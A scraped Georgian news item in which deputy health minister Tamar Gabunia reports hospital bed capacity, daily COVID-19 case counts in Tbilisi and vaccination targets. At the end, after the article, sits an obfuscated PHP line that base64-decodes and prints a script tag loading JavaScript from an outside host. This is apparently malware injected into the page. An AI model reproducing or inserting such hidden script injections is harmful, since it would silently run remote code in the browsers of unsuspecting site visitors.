celsiusi
ავერსი საქკაბელი
ჯამურად მობილიზებულია დაახლოებით 8000 საწოლი საავადმყოფოებში, რაც არის ჩვენი სისტემის მაქსიმუმი. ამას ყოველდღიურად ემატება კოვიდსასტუმროების რაოდენობა, - ამის შესახებ ჯანდაცვის მინისტრის მოადგილე თამარ გაბუნიამ საკოორდინაციო საბჭოს სხდომის დასრულების შემდეგ გამართულ ბრიფინგზე განაცხადა.
 
მისი თქმით, კორონავირუსის გავრცელების მხრივ განსაკუთრებით საყურადღებოა თბილისი, რადგან მეტი დატვირთვა და შემთხვევების გამოვლენა სწორედ დედაქალაქზე მოდის. შეგახსენებთ, უკანასკნელი 24 საათის განმავლობაში მხოლოდ თბილისში კორონავირუსით ინფიცირების 2297 ახალი ფაქტი გამოვლინდა.
 
გარდა ამისა, გაბუნიამ ვაქცინაციის პროცესზეც გააკეთა კომენტარი. მისი თქმით, მნიშვნელოვანია ვაქცინაციის პროგრამის სწრაფი გაფართოება.
 
„გუშინ განხორციელდა 16 000-ზე მეტი აცრა. ბოლო პერიოდში ვაქცინაციის ყოველდღიური საშუალო მაჩვენებელი არის დაახლოებით 15 000, რაც სამჯერ მეტია, ვიდრე გასული კვირების განმავლობაში, თუმცა ჩვენი მიზანია სულ მცირე 25 000 აცრა ყოველდღიურად. ემატება ეტაპობრივად სამედიცინო დაწესებულები, რითაც ვაქცინაციის პროცესი კიდევ უფრო გააქტიურდება“, - განაცხადა თამარ გაბუნიამ.
1086
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");